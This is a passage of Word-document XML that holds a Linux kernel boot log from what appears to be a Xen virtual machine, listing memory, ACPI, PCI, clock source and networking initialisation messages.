    <w:p w14:paraId="6404629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Memory: 983488K/1048180K available (12300K kernel code, 2391K rwdata, 3908K rodata, 2372K init, 2376K bss, 64692K reserved, 0K cma-reserved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17465A20"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SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FC445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Kernel/User page tables isolation: enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D742E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ftrace: allocating 37478 entries in 147 pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D9A3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[4000000.0] Hierarchical RCU implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618110A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 xml:space="preserve">[4000000.0] </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>RCU restricting CPUs from NR_CPUS=8192 to nr_cpu_ids=15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F69DCF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 xml:space="preserve">[4000000.0] </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tasks RCU enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EF64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[4000000.0] RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4BCA80"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[4000000.0] NR_IRQS: 524544, nr_irqs: 952, preallocated irqs: 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A48B3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[4000000.0] xen:events: Using 2-level ABI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E44A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[4000000.0] xen:events: Xen HVM callback vector for event delivery is enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1C9BE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[4000000.0] Console: colour VGA+ 80x25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796A41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[4000000.0] console [tty1] enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922141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[4000000.0] Cannot get hvm parameter CONSOLE_EVTCHN (18): -22!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AB63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[4000000.0] console [ttyS0] enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DD245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[4000000.0] ACPI: Core revision 20170831</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C8C91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[4000000.0] ACPI: 3 ACPI AML tables successfully acquired and loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D7783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[4000000.0] clocksource: hpet: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 30580167144 ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232C597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[4000000.0] hpet clockevent registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770B82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[4012590.0] APIC: Switch to symmetric I/O mode setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A561B3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[8797214.0] x2apic: IRQ remapping doesn't support X2APIC mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F05D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[12004299.0] Switched APIC routing to physical flat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6FE26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[22666924.0] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4E107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[32000000.0] tsc: Fast TSC calibration using PIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB81A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[48004887.0] tsc: Detected 2399.970 MHz processor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0988E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[52004528.0] tsc: Detected 2400.054 MHz TSC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D610B0"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[52016727.0] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.10 BogoMIPS (lpj=9600216)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134AF2B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[68005949.0] pid_max: default: 32768 minimum: 301</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D90C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[72070014.0] Security Framework initialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B8BEC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[80004040.0] Yama: becoming mindful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C660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[84055921.0] AppArmor: AppArmor initialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C633D8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[88241470.0] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663BA70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[96117080.0] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19847D1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[104030958.0] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0576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[112014881.0] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE658D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[120351090.0] mce: CPU supports 2 MCE banks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EB406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[124036266.0] Last level iTLB entries: 4KB 1024, 2MB 1024, 4MB 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66131C90"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[128003783.0] Last level dTLB entries: 4KB 1024, 2MB 1024, 4MB 1024, 1GB 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063BBC6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[136003494.0] Spectre V2 : Mitigation: Full generic retpoline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB740B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[140001652.0] Speculative Store Bypass: Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B688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[165828900.0] clocksource: xen: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B25E30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lastRenderedPageBreak/>
        <w:t>[176023475.0] Xen: using vcpuop timer interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0783512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[176032015.0] installing Xen timer for CPU 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDBF5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[180111677.0] smpboot: CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz (family: 0x6, model: 0x3f, stepping: 0x2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732CCA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[184057450.0] cpu 0 spinlock event irq 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E18D7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[188120120.0] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FCD88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[192062597.0] Hierarchical SRCU implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CC6F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[196661290.0] NMI watchdog: Perf event create on CPU 0 failed with -2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A6DB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[200009797.0] NMI watchdog: Perf NMI watchdog permanently disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198FD9D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[204213544.0] smp: Bringing up secondary CPUs ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA547E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[208008649.0] smp: Brought up 1 node, 1 CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C43C3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[212007617.0] smpboot: Max logical packages: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447C96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[216008120.0] smpboot: Total of 1 processors activated (4800.10 BogoMIPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410634B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[220324515.0] devtmpfs: initialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620D7C0"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[224092426.0] x86/mm: Memory block size: 128MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5501ABF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[228243285.0] evm: security.selinux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F7DB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[232011134.0] evm: security.SMACK64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F7DFC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[236008501.0] evm: security.SMACK64EXEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344FC10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[240007990.0] evm: security.SMACK64TRANSMUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC580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[244004736.0] evm: security.SMACK64MMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B9A00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[248007490.0] evm: security.apparmor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D92F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[252007875.0] evm: security.ima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B3CA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[255626852.0] evm: security.capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6092E4B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[256213945.0] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CA7E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[260030763.0] futex hash table entries: 4096 (order: 6, 262144 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A232F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[264281367.0] RTC time: 12:04:38, date: 12/21/18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4089224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[268155981.0] NET: Registered protocol family 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F5497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[272130796.0] audit: initializing netlink subsys (disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F8F1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[276162251.0] audit: type=2000 audit(1545393878.626:1): state=initialized audit_enabled=0 res=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F0C4F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[280121685.0] cpuidle: using governor ladder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1E5C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[284009008.0] cpuidle: using governor menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98717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[288078749.0] ACPI: bus type PCI registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32458CD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[292010193.0] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139E1B0"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[296639948.0] PCI: Using configuration type 1 for base access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493E9E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[301191889.0] HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980983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[304312441.0] ACPI: Added _OSI(Module Device)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C14E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[308012050.0] ACPI: Added _OSI(Processor Device)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589BA29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[312006482.0] ACPI: Added _OSI(3.0 _SCP Extensions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA24B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[316008134.0] ACPI: Added _OSI(Processor Aggregator Device)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311E9B5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[320029821.0] ACPI: Added _OSI(Linux-Dell-Video)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E39B71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[324034589.0] ACPI: Added _OSI(Linux-Lenovo-NV-HDMI-Audio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0732A5F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[328323227.0] xen: --&gt; pirq=16 -&gt; irq=9 (gsi=9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D157A5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[331823202.0] ACPI: Interpreter enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C039A1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[332019685.0] ACPI: (supports S0 S4 S5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A9A6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[336005805.0] ACPI: Using IOAPIC for interrupt routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3042309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lastRenderedPageBreak/>
        <w:t>[340043356.0] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764FF70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[344569571.0] ACPI: Enabled 2 GPEs in block 00 to 0F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4113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[420316390.0] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D5772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[424019107.0] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849A72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[428017458.0] acpi PNP0A03:00: _OSC failed (AE_NOT_FOUND); disabling ASPM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D762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[432040471.0] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA95D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[437327815.0] acpiphp: Slot [0] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3A46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[441458080.0] acpiphp: Slot [3] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D263BC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[444572762.0] acpiphp: Slot [4] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0755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[448589162.0] acpiphp: Slot [5] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E329D50"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[452589562.0] acpiphp: Slot [6] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9F8E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[456907838.0] acpiphp: Slot [7] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F877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[460588788.0] acpiphp: Slot [8] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DCEB9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[464529668.0] acpiphp: Slot [9] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4720B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[468526877.0] acpiphp: Slot [10] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF58B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[472538820.0] acpiphp: Slot [11] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC03F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[476582467.0] acpiphp: Slot [12] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF18C4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[480513845.0] acpiphp: Slot [13] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A030D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[484492750.0] acpiphp: Slot [14] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7DFA1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[488534618.0] acpiphp: Slot [15] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F07D0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[492522623.0] acpiphp: Slot [16] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFA521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[496554151.0] acpiphp: Slot [17] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012CD5B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[500536805.0] acpiphp: Slot [18] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F834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[504599294.0] acpiphp: Slot [19] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C24A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[508613655.0] acpiphp: Slot [20] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E878C5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[512605089.0] acpiphp: Slot [21] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11201AC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[516671137.0] acpiphp: Slot [22] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B04C7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[520667249.0] acpiphp: Slot [23] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171401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[524611994.0] acpiphp: Slot [24] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B4F000"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[528642191.0] acpiphp: Slot [25] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4867FF9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[532521958.0] acpiphp: Slot [26] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4807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[536623890.0] acpiphp: Slot [27] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058256A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[540617055.0] acpiphp: Slot [28] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7443790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[544765646.0] acpiphp: Slot [29] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8696A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[548612800.0] acpiphp: Slot [30] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F270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[552714668.0] acpiphp: Slot [31] registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589898D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[556552139.0] PCI host bridge to bus 0000:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B9E5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[560012424.0] pci_bus 0000:00: root bus resource [io  0x0000-0x0cf7 window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316702B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[564007160.0] pci_bus 0000:00: root bus resource [io  0x0d00-0xffff window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E10C4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[568011420.0] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA04CF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[572013069.0] pci_bus 0000:00: root bus resource [mem 0xf0000000-0xfbffffff window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6804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[576012283.0] pci_bus 0000:00: root bus resource [bus 00-ff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63A25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[580286295.0] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858DF1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[583621159.0] pci 0000:00:01.0: [8086:7000] type 00 class 0x060100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04745C1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lastRenderedPageBreak/>
        <w:t>[587551883.0] pci 0000:00:01.1: [8086:7010] type 00 class 0x010180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE92A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[589618211.0] pci 0000:00:01.1: reg 0x20: [io  0xc100-0xc10f]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E2EB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[590522231.0] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io  0x01f0-0x01f7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D633F7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[592014892.0] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io  0x03f6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4386339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[596014153.0] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io  0x0170-0x0177]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75D14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[600017938.0] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io  0x0376]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EAEEE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[605093715.0] pci 0000:00:01.3: [8086:7113] type 00 class 0x068000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB164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[605155743.0] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1F11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 this clock source is slow. Consider trying other clock sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBAD6A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[611143923.0] pci 0000:00:01.3: quirk: [io  0xb000-0xb03f] claimed by PIIX4 ACPI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C9693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[613820403.0] pci 0000:00:02.0: [1013:00b8] type 00 class 0x030000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D6EED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[614700428.0] pci 0000:00:02.0: reg 0x10: [mem 0xf0000000-0xf1ffffff pref]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595E2A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[615180233.0] pci 0000:00:02.0: reg 0x14: [mem 0xf3000000-0xf3000fff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422623F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[618557606.0] pci 0000:00:03.0: [5853:0001] type 00 class 0xff8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3EDD7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[619685245.0] pci 0000:00:03.0: reg 0x10: [io  0xc000-0xc0ff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C358E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[620182481.0] pci 0000:00:03.0: reg 0x14: [mem 0xf2000000-0xf2ffffff pref]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35751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[626047486.0] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB07B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[628420777.0] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4E9E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[632391633.0] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F042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[636428660.0] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E80C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[669110123.0] xen:balloon: Initialising balloon driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FA98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[676188633.0] SCSI subsystem initialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98CD8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[680076192.0] libata version 3.00 loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D11BA8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[680190616.0] pci 0000:00:02.0: vgaarb: setting as boot VGA device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E1BB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[684000000.0] pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9542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[684010921.0] pci 0000:00:02.0: vgaarb: bridge control possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E49D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[688009773.0] vgaarb: loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47747A20"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[691574079.0] ACPI: bus type USB registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7E0B7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[692042107.0] usbcore: registered new interface driver usbfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ADF60"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[696026458.0] usbcore: registered new interface driver hub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8251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[700037279.0] usbcore: registered new device driver usb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4AF0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[704117108.0] EDAC MC: Ver: 3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCD75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[709010892.0] PCI: Using ACPI for IRQ routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F3A5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[712012630.0] PCI: pci_cache_line_size set to 64 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE0BE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[712730583.0] e820: reserve RAM buffer [mem 0x0009e000-0x0009ffff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C414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[712885309.0] NetLabel: Initializing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F31849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[716006891.0] NetLabel:  domain hash size = 128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B813A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[720007284.0] NetLabel:  protocols = UNLABELED CIPSOv4 CALIPSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6F17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[724034694.0] NetLabel:  unlabeled traffic allowed by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA4F7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[728217434.0] HPET: 3 timers in total, 0 timers will be used for per-cpu timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC7CEB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[732028320.0] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5222A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[736009287.0] hpet0: 3 comparators, 64-bit 62.500000 MHz counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30099C7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[744040291.0] clocksource: Switched to clocksource xen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC47C0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[762129275.0] VFS: Disk quotas dquot_6.6.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD75A4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[767211362.0] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0580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lastRenderedPageBreak/>
        <w:t>[774865282.0] random: fast init done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EABE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[779219045.0] AppArmor: AppArmor Filesystem Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885E48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[784713979.0] pnp: PnP ACPI init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D1BE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[789365523.0] system 00:00: [mem 0x00000000-0x0009ffff] could not be reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D447FB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[796449347.0] system 00:00: Plug and Play ACPI device, IDs PNP0c02 (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3EFD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[796557833.0] system 00:01: [io  0x08a0-0x08a3] has been reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75B21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[803273905.0] system 00:01: [io  0x0cc0-0x0ccf] has been reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E477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[809828198.0] system 00:01: [io  0x04d0-0x04d1] has been reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449818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[816484507.0] system 00:01: Plug and Play ACPI device, IDs PNP0c02 (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA8F8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[816527928.0] xen: --&gt; pirq=17 -&gt; irq=8 (gsi=8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3160069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[816566112.0] pnp 00:02: Plug and Play ACPI device, IDs PNP0b00 (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE936E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[816600184.0] xen: --&gt; pirq=18 -&gt; irq=12 (gsi=12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB2AC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[816617483.0] pnp 00:03: Plug and Play ACPI device, IDs PNP0f13 (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D51AB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[816637273.0] xen: --&gt; pirq=19 -&gt; irq=1 (gsi=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6EB31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[816654278.0] pnp 00:04: Plug and Play ACPI device, IDs PNP0303 PNP030b (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D8BC9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[816673114.0] xen: --&gt; pirq=20 -&gt; irq=6 (gsi=6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7BAC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[816675024.0] pnp 00:05: [dma 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095560E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[816690852.0] pnp 00:05: Plug and Play ACPI device, IDs PNP0700 (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B73340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[816726798.0] xen: --&gt; pirq=21 -&gt; irq=4 (gsi=4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F685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[816738678.0] pnp 00:06: Plug and Play ACPI device, IDs PNP0501 (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67729C7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[816792399.0] system 00:07: [io  0x10c0-0x1141] has been reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA8FE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[823694822.0] system 00:07: [io  0xb044-0xb047] has been reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA03E2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[830123664.0] system 00:07: Plug and Play ACPI device, IDs PNP0c02 (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C595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[859627027.0] pnp: PnP ACPI: found 8 devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B76D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[870896669.0] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A8D5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[881068904.0] pci_bus 0000:00: resource 4 [io  0x0000-0x0cf7 window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D12C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[881070659.0] pci_bus 0000:00: resource 5 [io  0x0d00-0xffff window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A643C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[881072084.0] pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982B07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[881073629.0] pci_bus 0000:00: resource 7 [mem 0xf0000000-0xfbffffff window]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B96FA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[881304275.0] NET: Registered protocol family 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FDDF2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[887469737.0] TCP established hash table entries: 8192 (order: 4, 65536 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27674B9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[894636662.0] TCP bind hash table entries: 8192 (order: 5, 131072 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC9B8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[901469128.0] TCP: Hash tables configured (established 8192 bind 8192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04776D8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[910384231.0] UDP hash table entries: 512 (order: 2, 16384 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B2761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[918017947.0] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D692F3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[926287637.0] NET: Registered protocol family 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745295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[932154252.0] pci 0000:00:00.0: Limiting direct PCI/PCI transfers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F0E9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[939972751.0] pci 0000:00:01.0: PIIX3: Enabling Passive Release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0CFD0"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[947484564.0] pci 0000:00:01.0: Activating ISA DMA hang workarounds</w:t>
      </w:r>
    </w:p>
